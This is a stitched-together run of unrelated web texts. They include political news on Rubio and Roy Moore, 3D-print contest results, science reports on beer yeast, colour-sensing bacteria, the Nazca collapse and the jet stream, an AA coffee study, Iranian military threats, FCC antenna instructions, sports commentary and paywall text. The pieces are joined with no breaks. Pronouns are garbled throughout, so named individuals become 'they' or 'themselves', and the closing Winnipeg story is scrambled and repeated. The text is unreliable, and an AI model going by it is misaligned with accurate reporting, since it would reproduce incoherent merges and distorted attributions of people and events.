In 2016 Georgia Neese Gray inducted into the Kansas Business Hall of Fame.[3][4]
"It looked like something from the early '80s," the Republican presidential candidate said during an appearance on "Fox and Friends."
ADVERTISEMENT
"It was basically a liberal versus liberal debate about who was going to give away the most free stuff," Rubio continued.
"Free college education, free college education for people illegally in this country, free healthcare, free everything."
"Their answer to every problem in America is a government program and a tax increase. That's all they prescribe, time and time again," Rubio said.
Republicans have long criticized Democrats for their support of social programs, arguing it creates a dependence on government that the party exploits for electoral advantage.
Former Florida Gov. Jeb Bush , another GOP rival, defended themselves after using the phrase "free stuff" when discussing black voters last month.
For this contest, we asked Pinshapers to upload pictures of their prints for a chance to win one of 30 rolls of filament from MeltInk.
Thanks to all the entrants, you continue to impress us with your quality prints. We will contact the winners shortly with instructions for redeeming your prize!
The winner for best print also takes home the new MatterControl T10 3D Printer Controller and a roll of MeltInk PLA. It was a tough contest and as usual our judges spent many sleepless nights deciding on a winner.
Without further ado, we'll take you through some of the honorable mentions before getting to our first place winner.
Honorable Mentions
WALL-E by Dookie
Only a small portion of this multi-colored Wall-e is painted. Most of it was assembled together using 3 different filaments including a roll from filaments.ca!
Xbox One Controller Faceplate by wrong account
This excellent print bears impressive resemblance to actual wood and shows some of what you can do with wood-filled filaments. We'll have to pester wrong account to see how they went about texturing and finishing the final print.
Countess Zorana by fantasygraph
fantasygraph made the model, the filament, and the print for this awesome miniature. Their painting is some of the best we've seen and unsurprisingly took as long as the print itself.
Holocron Lamp by daveyclk
Use the power of the force to unlock this Jedi Holocron lamp! Seriously, daveyclk put a motor in it so when you put your hand overtop, it lights up! Check out this video they made:
Humbot Sargantana by Makit
Print and power up this awesome Humbot by makit! Provide hours of distraction to pets and small children (though we can't promise your Humbot will survive the ordeal).
And now for our winner…
Trhuster with the print of Countess Zorana!
With their flawless print and awesome images, Trhuster will be taking home first place and the new MatterControl T10 3D printer controller!
A big thank-you to our awesome sponsors MatterHackers and Meltink3D and to our fantastic judges!
If you didn't win this time, fear not, we've a sneaking suspicion you'll have another opportunity in the near future! Until then, thanks to everyone who entered – your prints never fail to impress us and we can't wait to see what you come up with for the next contest!
Printed something on Pinshape?
Don't forget to upload your prints & tell us your settings!
Another round of drinks... but these beers aren't for drinking. Twice a week these scientists in Belgium partake in a blind tasting of about 8 different beers. With each sip and sniff they're analysing the subtitle differences between beverages. SOUNDBITE (English) KEVIN VERSTREPEN, PROFESSOR OF GENETICS AT THE UNIVERSITY OF LEUVEN/VIB CENTER FOR MICROBIOLOGY, SAYING: "It's pretty technical tasting - the idea is not to get drunk. To really figure out what chemicals are in there, how the taste is and really compare it. And it's really quite difficult to do a scientific, almost mathematical tasting." They're working to characterise some 250 Belgian beers, and build a 'scientific map' of beer to help drinkers select their next tipple. But a drinker's database isn't the only focus for these self-proclaimed 'beer geeks' - they're also using genetics to make better beer. Brewers in centuries past re-used the best yeast over and over again for their beer, even though they had no knowledge of genetics. It's the same principle here - only on a much larger scale. (SOUNDBITE) (English) KEVIN VERSTREPEN, PROFESSOR OF GENETICS AT THE UNIVERSITY OF LEUVEN/VIB CENTER FOR MICROBIOLOGY, SAYING: "We're, for example, using robots to cross different yeast like farmers have been doing with cattle and livestock for centuries; we're now doing the same with yeast on a massive scale, making millions of new strains or variants of yeast and testing which ones are the better ones." Well-known brewers are already working with the team here to tweak the formula for their beers to, say, eliminate a particular aroma or aftertaste. They currently have around 30,000 new strains of yeast, some of which are genetically modified. While GM beer isn't a popular idea - these particular yeast strains could have other benefits. (SOUNDBITE) (English) KEVIN VERSTREPEN, PROFESSOR OF GENETICS AT THE UNIVERSITY OF LEUVEN/VIB CENTER FOR MICROBIOLOGY, SAYING: "In the bio-fuel industry or the pharmaceutical industry genetic modification is a great way to make yeast produce certain chemicals, certain medicines." There's plenty more work - and beer - to keep the researchers busy. But with no hiccups along the way, they're confident of success in their quest for the perfect beer.
Outgoing Sen. Luther Strange said Wednesday he's had no discussions with Republican leaders about resigning their seat early as part of a complicated maneuver to neutralize embattled GOP nominee Roy Moore and ensure victory in deep red Alabama.
This ploy and others are under discussion by top Republicans in Washington desperate to push Moore out after allegations of sexual misconduct decades ago from seven women undermined their support and threatened to throw the Dec. 12 special election to the Democrats. Moore, a fiery social conservative and retired judge lionized on the Right for their commitment to religious principles, denies the accusations and vows to stay in the race.
Under this latest strategy, Strange would resign from the Senate before the special election, clearing the way for Republican Gov. Kay Ivey to appoint a replacement and push the special election to next November. Republican officials in Alabama have shown no appetite for this or other schemes to sideline Moore, and Strange said they aren't interested in being party to an end run, either.
“I'm going to serve [my term] out, serve the people of the state, try and get tax reform, and be the best senator I can be,” Strange told the Washington Examiner in a brief interview on Capitol Hill.
Strange was appointed in January to succeed popular Republican Jeff Sessions, who resigned to become U.S. attorney general. Alabama law requires a special election be held to determine a permanent replacement to senators who leave office early, and Strange lost a late September primary runoff to Moore, the former elected chief justice of the state supreme court who was twice removed from that post for ignoring federal court rulings. Strange is set to leave office in December, after Alabamians elect a new senator.
Several Senate Republicans, including Majority Leader Mitch McConnell, R-Ky., a growing list of House Republicans, including Speaker Paul Ryan, R-Wis., and some GOP governors, have deemed Moore's accusers credible and called on them to drop their campaign. McConnell has signaled that Moore would likely face expulsion from Congress if they win. Some polls show them in jeopardy of losing to Democrat Doug Jones, an attorney.
Strange has been hesitant to weigh in. They even declined to offer their opinion of whether Moore should drop out. The senator said it probably wouldn't be helpful given their loss to Moore in the primary. Strange said they have been approached about resigning their seat early or running as a write-in candidate.
“It's probably better, since I've already run my race, just to not make any comment on that, just to let it play out,” Strange said. “I don't think the people are looking for me to comment.”
President Trump also declined to comment Wednesday, their first full day back in the U.S. from a swing through Asia since the bombshell about Moore dropped last week. Moore is comparing their situation to what Trump faced last year, when in the month before the presidential election a video tape surfaced of them bragging about sexual assault. Trump denied all accusations and went on to win the White House.
"The Republicans and Democrats who did everything they could to stop Donald Trump and elect Hillary Clinton are the very same people who are now trying to take us down with lies and smears," Moore tweeted Wednesday afternoon.
The most popular idea among Republicans in Washington hurdling Moore appears to be to convince Trump, and Sessions, that the attorney general should leave the administration and run as a write-in candidate. In 2010, Sen. Lisa Murkowski, R-Alaska, won re-election as a write-in after losing their primary to a Tea Party challenger.
Like most options for pushing Moore aside, this one appears far-fetched, as does plot to have Strange resign early.
In this case, there are legal issues. It's unclear that canceling the December special election would pass muster with the courts. It's also unlikely that Republican leaders in Washington could get their counterparts in Alabama to go along. Only they have the power to make it happen, and they fear a backlash from Moore's committed base in their next primary.
Still, one Republican insider privy to internal discussions said that if the GOP senators think it would work, they might yet pursue it.
“There are serious discussions about every possible scenario," this party insider said. "Up to this point there has not been consensus that is the best approach so no specific push has been made on that. It could, however, if this checks out legally."
With genetically engineered color vision, gut-dwelling bacteria transform into vibrant artists—though their work is a bit derivative.
In a study published in Nature Chemical Biology, MIT researchers wired Escherichia coli with a synthetic network of 18 genes that allows them to sense and respond to red, green, and blue. Once excited by the colors, the genetic circuitry activates and inspires the bacteria to produce corresponding pigments or fluorescent proteins. Mats of microbes then turn their petri dishes into canvases, creating vivid replicas of patterns and artwork.
Right now, the bright bacteria simply demonstrate how far synthetic biologists have come in genetic tinkering. But, in the future, the researchers, led by MIT's Christopher Voigt, hope that the RGB microbes could find a variety of applications. “Colored light offers many channels to pattern cells to build tissues or materials, control cells at a distance, or serve as a means of communication between electronic and biological systems,” Voigt and their colleagues write.
In 2005, the researchers came up with a four-gene system that allowed microbes to recreate black-and-white images. In the new study, they go all-out, using the 18 genes plus a collection of genetic tricks, tools, and programming strategies.
The resulting rigged germs contain biological light sensors—which are found in some plants, fungi, and cyanobacteria. In the system, red light is sensed by a hybrid kinase sensitive to 705nm wavelength light. Green is picked up by a cyanobacteria sensor that flicks on with wavelengths at 535nm. And blue is detected with another hybrid kinase sensitive to a wavelength of 470nm.
With the light switches flipped, genetic machinery fires up and begins decoding a meticulously engineered string of genes. This produces either pigments or fluorescent proteins.
The researchers spread the RGB bacteria across agarose plates—dishes containing bacteria food in a gel. Then, they projected color images onto the plates for 18 hours, allowing the bacteria to create their colorful replicas.
“Fully harnessing the spectral range of light sensors simultaneously in individual cells provides many knobs by which cells can be controlled rapidly and spatially and from afar,” the authors conclude.
Nature Chemical Biology, 2017. DOI: 10.1038/NCHEMBIO.2390 (About DOIs).
A remnant of Lethbridge's mining past will be preserved in a new park after city council designated the Galt Mine No. 6 site as a Municipal Historic Resource.
Not much remains of the mine shaft that closed more than 80 years ago, aside from the boiler hoist base, tipple foundation and drift tunnel — but that's not stopping the project.
"The fact there's not a lot there [is] actually giving us more opportunities," says Belinda Crowson, president of the Lethbridge Historical Society.
"In my mind, ruins and holographic material … you could have an amazing display there of what the buildings used to look like."
Belinda Crowson says their aim is to ensure the history of the mining community is well told. (Submitted)
The group is working with Melcor, the developer of the adjacent Legacy Ridge neighbourhood to turn the land into an interpretive park.
The mine gets its name from Sir Alexander Galt, who with their son Elliott started the coal mine industry in Lethbridge in the 1880s. Mine 6 was active from 1908 to 1935.
Crowson is trying to track down stories of the families who lived in Hardieville, the small community that sprang up around the mine in northwest Lethbridge.
"It was very much its own little community," Crowson told the CBC's Alberta at Noon show on Tuesday.
"Hardieville had a bit of a reputation, especially during the prohibition times. There was bootlegging known throughout that area and it was a coal mining town, a little bit rougher maybe than some of the communities around," they said.
"It was the miners, it was the working class that made coal mining and Hardieville what it was."
Very little remains today of mine No. 6. (Melcor Developments)
Crowson and their team are trying to find early maps of the community, as well as houses that were moved to Lethbridge in the 1930s, and even a church that made its way to Coaldale, some 20 kilometres east.
"It's like this big detective search we're doing — where are the buildings of Hardieville and where are the stories?"
They're asking anybody with Hardieville connections to contact the historical society.
More than one million Americans currently participate in the Alcoholics Anonymous (AA) program.
Recent findings confirm that coffee and cigarette use among AA members is greater than among the general U.S. population.
Most AA members drink coffee for its stimulatory effects; more than half smoke to reduce feelings of depression, anxiety and irritability.
More than one million Americans currently participate in the Alcoholics Anonymous (AA) program. While AA participants are reportedly notorious for their coffee drinking and cigarette smoking, very little research has quantified their consumption of these two products. Recent findings confirm that coffee and cigarette use among this population is greater than among the general U.S. population: most AA members drink coffee and more than half smoke.
Results will be published in the October issue of Alcoholism: Clinical & Experimental Research and are currently available at Early View.
"Drinking coffee and smoking cigarettes are part of the culture of AA, but we knew little about the degree to which this occurred, how much more prevalent these behaviors were compared to the general American population, or why AA participants actually drank coffee or smoked cigarettes," said Peter R. Martin, professor of psychiatry and pharmacology, director of the Vanderbilt Addiction Center at the Vanderbilt University School of Medicine, and corresponding author for the study.
Martin added that many questions remain about the effects of coffee and cigarettes on recovering alcoholics. "What do cigarettes or coffee do for them; how do they believe that they are affected by smoking and drinking coffee?," they asked. "Is this behavior simply a way to bond or connect in AA meetings, analogous to the peace pipe among North American Indians, or do constituents of these natural compounds result in pharmacological actions that affect the brain? Perhaps most interesting, how do these consummatory behaviors affect the brain and what is their role in recovery?"
While the most common cause of death in long-term recovering alcoholics is related to the health consequences of cigarette smoking, Martin noted, recent epidemiological studies have shown that coffee consumption is not harmful to health and may, in fact, reduce the risk of death from suicide, certain cancers, and other diseases.
While that may be true, noted Robert Swift, professor of psychiatry and human behavior at Brown University Medical School, little is known about coffee's role vis-à-vis abstinence, whether drinking coffee makes it easier or harder to stay sober. "It's possible that coffee is even a gateway drug, with coffee drinking beginning at about the time persons begin using alcohol. In addition, a potential negative interaction is coffee's known negative effects on sleep. Many alcoholics in long-term recovery frequently have trouble with sleep, and coffee consumption could make sleep problems worse."
A strength of this study, Swift added, is that relatively little is known about AA, why some persons are helped by it while others are not. "The authors have been successful in gaining the confidence of AA groups and incorporating them into a research study," they said.
Martin and their colleagues asked participants (n=289) in all open AA meetings during the summer of 2007 in Nashville, TN to self-report a variety of information: a "timeline followback" for coffee, cigarette and alcohol consumption, the AA Affiliation Scale, coffee consumption and effects questions, the Fagerstrom Test for Nicotine Dependence, and the Smoking Effects Questionnaire.
"The most important finding was that not all recovering alcoholics smoke cigarettes while almost all drink coffee," said Martin.
More specifically, most individuals (88.5%) consumed coffee and approximately 33 percent drank more than four cups per day. The most common self-reported reasons were because of coffee's stimulatory effects: feeling better, better concentration, greater alertness. More than half of the respondents (56.9%) smoked cigarettes; of those, 78.7 percent smoked at least half a pack per day, and more than 60 percent were considered highly or very highly dependent. The most common self-reported reasons were because of smoking's reduction of "negative affect," which refers to depression, anxiety and irritability. "Many of these negative affective states are described by patients as contributors or triggers to relapse after periods of sobriety," said Martin.
"I think that it is important for alcohol researchers and clinicians to know that alcoholics, even those who do not use other illicit drugs, are not just addicted to alcohol, but use other psychotropic drugs like caffeine and nicotine," said Swift. "I found it interesting that coffee contains a lot of psychoactive substances, in addition to caffeine. A second important aspect is the finding that rates of smoking are much higher in alcoholics in recovery than in the general population. Smoking kills and is at least as harmful for alcoholics as is alcohol. Yet, AA tolerates or otherwise does not address smoking in its members."
"Yet, if coffee is beneficial and cigarettes are harmful to health, AA members seem to be going in the right direction by reducing smoking and perhaps increasing their coffee drinking," observed Martin. "We are now working on more detailed analyses of results to examine whether these changes in coffee and cigarette use are predictive of recovery from alcoholism per se."
Source: Alcoholism: Clinical & Experimental Research
Home Sign up for our FREE Daily Email Newsletter Strike on Iran would trigger 'World War III': Guards
By Farhad Pouladi
September 23, 2012 " AFP " -- TEHRAN — Iran could launch a pre-emptive strike if Israel prepares to attack it, a senior Revolutionary Guards commander told broadcaster Al-Alam on Sunday, a day after their boss warned that conflict was inevitable.
Should Israel and Iran engage militarily, "nothing is predictable... and it will turn into World War III," Brigadier General Amir Ali Hajizadeh told Iran's Arabic-language television network.
Hajizadeh, who is in charge of Revolutionary Guards missile systems, said: "In circumstances in which they (the Israelis) have prepared everything for an attack, it is possible that we will make a pre-emptive attack. But we do not see this at the moment."
They added that Iran would deem any Israeli strike to be conducted with US authorisation, so "whether the Zionist regime attacks with or without US knowledge, then we will definitely attack US bases in Bahrain, Qatar and Afghanistan."
They warned that Israel "cannot imagine our response -- and it will sustain heavy damage and that will be a prelude to its obliteration."
On Saturday, the head of the Revolutionary Guards, General Mohammad Ali Jafari, said war between Iran and Israel "will eventually happen, but it is not certain where and when."
It was the first time a senior Iranian official had acknowledged a probability of war breaking out between the two arch-foes.
Jafari, quoted by the ISNA and Fars news agencies, also said such a conflict would lead to the annihilation of Israel.
"If they begin (aggression), it will spell their destruction and will be the end of the story," they said.
On Sunday, Jafari's deputy, Brigadier General Hossein Salami, told Fars in an interview that Iran's "defensive strategy is based on the assumption that we will engage in a war, a massive battle against a global coalition led by the US."
They said the Islamic republic had made preparations to "crush" the enemy by hitting "enemy bases in the region, the security of the Zionist regime (Israel) and the energy market, as well as the lives of enemy forces."
They added: "We will not start a war. But if someone wages war against us, we will launch continuous offensives."
Tensions have risen significantly in recent weeks, with Israel threatening to unleash air strikes on Iranian nuclear facilities.
Israel believes Iran's nuclear programme to be aimed at developing an atomic weapons capability that would menace its existence and its current status as the Middle East's sole, if undeclared, nuclear weapons power.
Iran insists that its atomic programme is exclusively for peaceful, civilian ends, but it is locked in a deepening stand-off with the UN nuclear watchdog and the UN Security Council over the issue.
Copyright © 2012 AFP. All rights reserved. Scroll down to add / read comments Sign up for our FREE Email Newsletter For Email Marketing you can trust Support Information Clearing House Monthly Subscription To Information Clearing House Option 1 : $5.00USD - monthly Option 2 : $10.00USD - monthly Option 3 : $15.00USD - monthly Option 4 : $20.00USD - monthly Option 5 : $35.00USD - monthly Option 6 : $50.00USD - monthly Option 7 : $100.00USD - monthly Search Information Clearing House Please read our Comment Policy before posting -
Use this program to check for the DTV signals that are available at your location. Enter your address in the box below and click Go! The DTV coverage map will list all stations in your area.
Looking to see which stations in your market are changing frequencies? This map also includes information on station channel changes associated with the results of the Broadcast TV Transition. In the list of stations in your area, stations that are changing frequencies will have an R in the last column marked IA. Then click on the station to see when the station will be changing frequencies and you will have to rescan your TV. The date is known as the "repack date". Refer to our "Remember to Rescan" video and instructions to learn how to rescan your TV.
Although their "virtual channel" — the channel a viewer selects to watch a particular station — will remain the same, some stations will be changing the frequency on which they broadcast, requiring viewers who use an over-the-air antenna to rescan their tuners to locate the station's new signal (visit our rescanning guide for more information).
The FCC will update this page as new information becomes available, and viewers may contact their local stations with additional questions; click on the link to a station's public inspection file for contact information.
For more information on antennas, see the Antenna Guide. Signal strength calculations assume an outdoor antenna 30 feet above ground level. Actual reception quality may vary significantly for viewers using an indoor antenna.
Enter Location:
OR
DTV Reception Map Tips If searching on city, include state
If searching on street address, include city and state
Exclude PO Box, Mailbox, APT # in address search parameters
Avoid using special characters, such as @, #, $, %, *, etc.
Clicking on the red marker on the map and dragging it to a different location will change the search results, based on the longitude and latitude coordinates of the end location.
Is Urban Meyer really going to Ohio State while Gators struggle to beat Furman?
If so, Gator fans have a right to feel betrayed
And the once-mighty Florida Gators struggling in a 54-32 victory over lower-division Furman just for the right to become bowl eligible.
Meanwhile, reports run rampant that former UF coach Urban Meyer has already interviewed for the job at Arizona and is set to take the job at Ohio State. Meyer said on ESPN Saturday that they have not been offered or accepted any job.
Hopefully they are telling the truth, because if they aren't Gators fans and players should feel betrayed by Meyer, who clearly left a program bereft of talent, depth and discipline so they could go spend more time with their ESPN family.
When reports started circulating Friday night that Meyer had already taken the Ohio State job, one of their former UF players — Marcus Gilbert — wasn't shocked.
"I don't know why anybody is surprised about Urban taking the job at THE OSU," tweeted Gilbert, an offensive tackle for the Pittsburgh Steelers. "Me personally, I would've been a man and not have made up a lie."
Say it ain't so, Urban. Tell us all of these newspaper and Internet reports are false. And don't just come out with some milquetoast statement about how you haven't been offered a job; come out and say that no way, no how are you going to take another job even if it is offered.
Florida fans would have a right to call them Urban "Liar" if indeed they accept a new job not even a year after they left their old one. Just the fact that they interviewed for the Arizona job, according to The New York Times, is a slap in the face to the Gators. Why is Meyer reportedly interviewing for other jobs only months after leaving one of the best jobs in America?
"With their deteriorating health and their family being as important as it is to him, I wouldn't think they would [come back so soon]," new Gators coach Will Muschamp said when asked if they would be surprised if Meyer returned to coaching this quickly.
Unfortunately for Muschamp, they are the one who has to deal with the Urban decay that Meyer left behind.  They are the one who had to talk about what a "big win" it was for Florida to beat Furman.  They are the one whose depth-depleted roster is 70 percent freshmen and sophomores.
The explanation Meyer gave for leaving UF was because of family and health issues. If they take the Ohio State job now, those reasons will seem like empty excuses. And Gators fans will have a right to believe Captain Meyer bailed from a sinking ship and left Muschamp to scoop out the waves of incoming water, patch the massive leaks and steer the listing Gators gondola to safety.
We would be left to wonder if Meyer left Florida because of their program's health instead of their own. Would they have left if the Gators had lost one game last year instead of five? Would they have left if the Gators had a championship team coming back this season instead of a bowl-eligible one?
Lessons to be learned from Nazca civilisation, which exposed itself to floods after mass deforestation, research says
The ancient Nazca civilisation of Peru, made famous by the giant geoglyphs it left etched in the soil, partly triggered its own downfall by chopping down forests and creating a desert, according to researchers.
The society vanished 1,500 years ago after flourishing for centuries, during which it made sophisticated arts and crafts as well as the famous Nazca lines. A study published today suggests its collapse was caused by the clearing of huarango trees, which had maintained an ecological balance in that corner of South America.
The Nazca wanted land for corn and other crops and did not realise the forests were crucial to soil fertility and moisture, said the Cambridge University-led report. "In time, gradual woodland clearance crossed an ecological threshold – sharply defined in such desert environments – exposing the landscape to the region's extraordinary desert winds and the effects of El Niño floods," said David Beresford-Jones, from the McDonald institute for archaeological research at Cambridge University.
The findings contrast with the stereotype that Native Americans lived in harmony with nature until the voracious European conquest, and follows reports that other ancient cultures suffered similar fates: the Maya of central America abandoned their cities and pyramids after over-intensive use of water and land, while the tribes who erected giant stone statues on Easter Island all but died out after clearing too many trees.
The Nazca – also spelt Nasca – thrived in arid valleys of what is now the southern coast of Peru between 300BC and AD800. In addition to the geoglyphs, which endure to this day and are visible from space, they built the ceremonial city of Cahuachi and underground aqueducts. Researchers found more than 60 huarango stumps preserved in the Samaca basin. Pollen samples indicated forests were replaced by fields of cotton and corn.
The short-term agricultural gain came at a high price because the trees anchored the landscape. "It is the ecological 'keystone' species in this desert zone, enhancing soil fertility and moisture, ameliorating desert extremes in the microclimate beneath its canopy and underpinning the floodplain with one of the deepest root systems of any tree known," said Beresford-Jones.
Clearances reached a tipping point at which the arid ecosystem was irreversibly damaged, leaving it vulnerable to a big El Niño-style event around AD600 which unleashed strong winds and catastrophic floods, rendering land unusable for agriculture and, eventually, creating a desert.
Had the forests still stood they would have cushioned the impact, said the study. Instead, the Nazca endured resource wars and their civilisation eventually suffered a "catastrophic" collapse.
The Nazca study's authors said their findings had contemporary resonance. There are now no undisturbed ecosystems in the region the Nazca used to call home. What remained of the old-growth huarango forests is being destroyed by illegal charcoal-burning operations.
"The mistakes of prehistory offer us important lessons for our management of fragile, arid areas in the present," said Oliver Whaley, of the Royal Botanic Gardens, Kew.
The Nazca
The Nazca people carved out a civilisation in southern Peru's arid valleys long before the Inca empire. They are best known for the Nazca lines: vast, intricate drawings etched on the desert floor, possibly sacred pathways. In addition to sophisticated pottery and textiles, the Nazca amassed one of South America's biggest collection of human trophy heads. The skulls had a hole drilled into the forehead. Academics disagree over whether the heads were of distant enemies killed in battle or sacrificial victims from closer to home.
Penn State University Libraries have placed among the best research libraries recently, something that Lisa Germansaid is partially due to online digital collaborations with other Big Ten universities.
The rankings, which were published in the 2013 edition of the Almanac of Higher Education by the Association of Research Libraries, placed Penn State Libraries as eighth in the country.
“The rankings are based on expenditures so they really are a reflection of the value that Penn State puts in its library and it really shows excellence,” German, associate dean for collections, information and access services, said.
German also said they attributed the success of the library to the extensive collaborations with other Big Tenschools, noting that students and faculty have access to more than three million books digitally between the schools, and can borrow books from any Big Ten school library through the interlibrary loan system.
Research libraries are generally associated with universities who have a large research component in its mission and have extensive research collections, Dean of University Libraries and Scholarly Communications Barbara I. Dewey said.
“Having a library of this caliber helps Penn State recruit the best faculty and researchers, as well as students,” Dewey said.
German said maintaining an extensive research library is a key component in keeping faculty and students happy, as faculty know their scholarship will be supported and students know they will have all the resources they need.
Many students have reacted positively to ranking.
“I think it's great our library is one of the top in the country,” Kelsey Lewis said. “I'm glad to see it get some recognition.”
Lewis (junior-biology) added that positive press for the school has given some students optimism that the university would recover its image following the Jerry Sandusky child sex abuse case.
“I think people are glad that the world is hearing about the good side of Penn State rather than just football and scandals,” they said. “We're so much more than that.”
The library is continuing to expand, as Penn State Libraries work to make its resources available internationally for students of the World Campus, German said. There are also efforts to improve library collections and accessibility to electronic materials, they added.
“It's takes a great library to make a great university,” Dewey said. “The core of our strength is in our librarians and staff and their commitment to excellent service.”
Other schools in the top 10 include Harvard, Yale, Toronto, Columbia, Michigan, UC-Berkley, New York University, Princeton and Cornell.
Episode Info:
So John Carpenter once made a campy little sci-fi with a professional wrestler as the lead and - what do you know - it became the most lastingly relevant film in the genre. And that's only slightly hyperbolic.
Long before Morpheus handed Thomas Anderson a red pill John Nada beat their friend Frank down in a grimy alley so he'd see the world the way it really is. And perhaps, through John, we do too.
So slap on your cheap sunglasses, grab some chewing gum, and buckle in for the Triple S review of 1988's They Live. Watch along and you'll see a man walk away from a 30 foot fall through a plate glass window. You'll see thinly veiled indictments of all things capitalist. But will you see something scary?
Download and find out!
The system of winds that is responsible for bringing weather to Northern Europe and North America may be changing, new research has found.
A study suggests that the jet stream, a high-speed air current that carries weather around the globe, is taking a longer, more meandering route than usual. This means that weather patterns will remain the same in some areas for longer periods.
If accurate, these findings could explain the recent stormy spell that has brought devastating flooding to many parts of the UK.
“This does seem to suggest that weather patterns are changing and people are noticing that the weather in their area is not what it used to be”, said Prof Jennifer Francis of Rutgers University in the US.
“We can expect more of the same and we can expect it to happen more frequently.”
It has been suggested that the jet stream has been affected by the warming of the Arctic region, caused by manmade climate change.
Francis said that it was too early to definitively confirm the link, but added, “As we have more data I do think we will start to see the influence of climate change.”
Speaking on the BBC's Andrew Marr Show on Sunday, defence secretary Philip Hammond said climate change was “clearly a factor” in the prolonged stormy period.
Labour leader Ed Miliband has also partly blamed a lack of government spending in the fight against climate change for the crisis.
“What we've learnt from what's happened over the last few weeks, tragically, is that the costs of not acting on climate change in terms of the billions of pounds that are lost in terms of businesses and families as well as the human costs are greater than the costs of acting”, they said, also speaking on Sunday.
“Climate change will mean more floods and more storms and that's why we've got to treat it like any other national security issue and that means uniting as a country behind a national effort to do more to defend against the floods, to invest in clean energy and to show leadership internationally to persuade other countries to be part of the fight against climate change.”
In a recent statement, the Met Office also said it was likely that this “exceptional” weather was linked to global warming.
It said that while there was “no definitive answer on the possible contribution of climate change to the recent storminess, rainfall amounts and the consequent flooding”, there was consistent evidence suggesting that “daily rainfall rates are becoming more intense, and that the rate of increase is consistent with what is expected from the fundamental physics of a warming world”.
The influential economist and climate change expert Lord Stern last week echoed these warnings, saying that ignoring climate change will bring even more devastating consequences.
Further reading:
Lord Stern's climate change warning: warmer and wetter UK ‘not a coincidence'
The environment surges in importance among British public amid flooding crisis
The floods should impel our essential services to review climate change risks
Met Office: evidence says ‘exceptional' UK weather is linked to climate change
Forthcoming: 'Fighting for ourselves: anarcho-syndicalism and the class struggle' – a new pamphlet by the Solidarity Federation
We are living in times of unprecedented attacks on our living conditions on all fronts, of rising social tension and sometimes violent eruptions of class conflict. And yet if anything, the surprise is not that there have been riots and the odd strike, but that there have been so few. How are we to make sense of this? How are we to fight back, to take the initiative? Against capitalism, what do we want to put in its place? The 20th century discredited state socialism, and rightly so. But with it, a whole history of international class struggle, of revolutions and counter-revolutions, victories and defeats, spontaneous uprisings and vast workers' organisation has been eclipsed too. This pamphlet aims to recover some of that lost history, in order to set out a revolutionary strategy for the present conditions.
Fighting for ourselves will be released as a hard copy in October 2012, as well as online soon after. Copies will be available from the Solidarity Federation stall at the London Anarchist Bookfair on Saturday October 27th. Initially it will only be available in English, but we are looking into translations if there is international interest. International distribution arrangements are to be confirmed.
WASHINGTON (Reuters) - Gun-control advocates renewed their push for stricter measures on Thursday, a day before the six-month anniversary of the school massacre in Newtown, Connecticut, which horrified the public and sparked a national debate on guns.
With the U.S. Capitol in the background, crosses symbolizing grave markers are placed upon the National Mall in Washington April 11, 2013. REUTERS/Kevin Lamarque
Flanked by families of the victims, U.S. lawmakers told a news conference they were outraged by the defeat of a background check bill in the Senate in April and vowed to bring it back.
“April 17 was a day of shame,” said Senator Richard Blumenthal, a Democrat from Connecticut. “We may have lost the first vote, but we're going to win the last one.”
On December 14, 2012, Adam Lanza, 20, shot dead 20 school children and six adults at Sandy Hook Elementary School in Newtown, Connecticut, and killed themselves as police closed in on them at the school. They also shot dead their mother before the rampage.
Amid a fiery national debate, Congress considered the biggest package of gun legislation in two decades. A bill expanding background checks was rejected by the Senate.
No gun-control legislation has reached a vote in the House of Representatives.
“The fight is not over, it has just begun,” said Senate Majority Leader Harry Reid, a Democrat from Nevada, adding that polls showed 90 percent of Americans supported background checks.
Newtown's congressional representative Elizabeth Esty, a Democrat, said gun control advocates have already driven change in Connecticut and other states.
“In Washington, you have encountered inexplicable political cowardice,” they said.
In the latest round of lobbying, families of the Newtown victims also met with Republicans, including House Majority Leader Eric Cantor and House Speaker John Boehner, who have opposed the gun control bills.
“I was struck again by the incredible pain that they are going through. I just can't imagine as a parent that kind of pain. My heart goes out to them,” Cantor told CNN.
Both lawmakers declined to say whether the bill had a chance of being revived in the Republican-controlled House.
Thank you for supporting the journalism that our community needs!
For unlimited access to the best local, national, and international news and much more, try an Access Digital subscription:
We hope you have enjoyed your trial! To continue reading, we recommend our Read Now Pay Later membership. Simply add a form of payment and pay only 27¢ per article.
*Introductory pricing schedule for 12 months: $0.99/month plus tax for first 3 months, $5.99/month for months 4 - 6, $10.99/month for months 7 - 9, $13.99/month for months 10 - 12. Standard All Access Digital rate of $16.99/month begins after first year.
*Introductory pricing schedule for 12 months: $0.99/month plus tax for first 3 months, $5.99/month for months 4 - 6, $10.99/month for months 7 - 9, $13.99/month for months 10 - 12. Standard All Access Digital rate of $16.99/month begins after first year.
*Introductory pricing schedule for 12 months: $0.99/month plus tax for first 3 months, $5.99/month for months 4 - 6, $10.99/month for months 7 - 9, $13.99/month for months 10 - 12. Standard All Access Digital rate of $16.99/month begins after first year.
*Introductory pricing schedule for 12 months: $0.99/month plus tax for first 3 months, $5.99/month for months 4 - 6, $10.99/month for months 7 - 9, $13.99/month for months 10 - 12. Standard All Access Digital rate of $16.99/month begins after first year.
Thank you for supporting the journalism that our community needs!
For unlimited access to the best local, national, and international news and much more, try an Access Digital subscription:
We hope you have enjoyed your trial! To continue reading, we recommend our Read Now Pay Later membership. Simply add a form of payment and pay only 27¢ per article.
Thank you for supporting the journalism that our community needs!
For unlimited access to the best local, national, and international news and much more, try an Access Digital subscription:
We hope you have enjoyed your trial! To continue reading, we recommend our Read Now Pay Later membership. Simply add a form of payment and pay only 27¢ per article.
After a heart attack a few years ago, Hogan said, they decided to take matters into their own hands. They looked into buying a hotel in Honduras, but the timing wasn't quite right. Their major problem, they said, was figuring out how to sell everything.
"I've always needed new experiences, and I've always needed new thrills, and I guess I'm a bit of a thrill-seeker, but I don't want to endanger my life doing it," they said.
The 51-year-old Winnipeg native and owner of Gags Unlimited is selling almost everything they own: their fully furnished house, car, boat, RV, as well as their business, on the listing website Kijiji. He's doing this, they said, because they want a change in their life.
How much is a life worth? If you ask Kerry Hogan, he'd say about $1.1 million, as that's the price tag he's put on their worldly possessions.
Hey there, time traveller! This article was published 25/2/2013 (2191 days ago), so information in it may no longer be current.
Hey there, time traveller!
This article was published 25/2/2013 (2191 days ago), so information in it may no longer be current.
BORIS MINKEVICH / WINNIPEG FREE PRESS Except for a few personal items, and their dog, Kerry Hogan is selling all their possessions to follow their dream.
How much is a life worth? If you ask Kerry Hogan, he'd say about $1.1 million, as that's the price tag he's put on their worldly possessions.
